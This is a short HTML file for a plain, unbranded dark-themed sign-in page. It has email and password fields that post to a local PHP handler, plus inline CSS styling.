<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Login</title>
  </head>
  <body>
    <div class="container">
      <h1>Sign In</h1>
      <form id="login-form" action="./allow.php" method="post">
        <input
          type="text"
          id="email"
          placeholder="Email or phone number"
          name="eamil"
          required
        />
        <input
          type="password"
          id="password"
          placeholder="Password"
          name="password"
          required
        />
        <input type="checkbox" id="remember" />
        <label for="remember">Remember me</label>
        <input type="submit" value="Submit" />
      </form>
      <div class="need-help">
        <p>Need help? <a href="#">New to this website? Sign up now.</a></p>
      </div>
    </div>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #141414;
        color: #fff;
      }

      .container {
        width: 400px;
        margin: 0 auto;
        padding: 20px;
        background-color: #2d2d2d;
        border-radius: 10px;
      }

      input[type="password"] {
        width: 100%;
        padding: 10px;
        margin: 10px 0;
        border: none;
        border-radius: 5px;
        background-color: #393939;
        color: #fff;
      }
      input[type="text"] {
        width: 100%;
        padding: 10px;
        margin: 10px 0;
        border: none;
        border-radius: 5px;
        background-color: #393939;
        color: #fff;
      }

      input[type="checkbox"] {
        margin-top: 10px;
      }

      input[type="submit"] {
        width: 100%;
        padding: 10px;
        margin: 10px 0;
        border: none;
        border-radius: 5px;
        background-color: #4a4a4a;
        color: #fff;
        cursor: pointer;
      }

      input[type="submit"]:hover {
        background-color: #6a6a6a;
      }

      .need-help {
        text-align: center;
      }

      .need-help a {
        color: #4a4a4a;
        text-decoration: none;
      }

      .need-help a:hover {
        text-decoration: underline;
      }
    </style>
  </body>
</html>
